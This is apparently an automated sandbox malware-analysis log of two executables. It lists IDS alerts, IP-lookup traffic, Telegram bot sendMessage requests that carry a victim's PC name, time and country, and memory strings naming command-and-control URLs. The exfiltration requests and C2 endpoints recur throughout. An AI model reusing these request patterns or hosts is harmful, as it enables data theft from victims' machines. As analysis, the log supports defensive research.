                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 132.226.8.169:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 132.226.8.169:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49714 -> 132.226.8.169:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49732 -> 132.226.8.169:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49741 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49752 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49788 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49753 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49809 -> 104.21.67.152:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49724 -> 104.21.67.152:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49705 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49716 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: kashmirestore.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 05 Dec 2024 17:51:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 05 Dec 2024 17:51:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kashmirestore.com
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1309507329.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: aoTiGLRa.exe, 00000011.00000002.1374494417.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehH
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20a
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003373000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003390000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003231000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003390000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.000000000325B000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228$
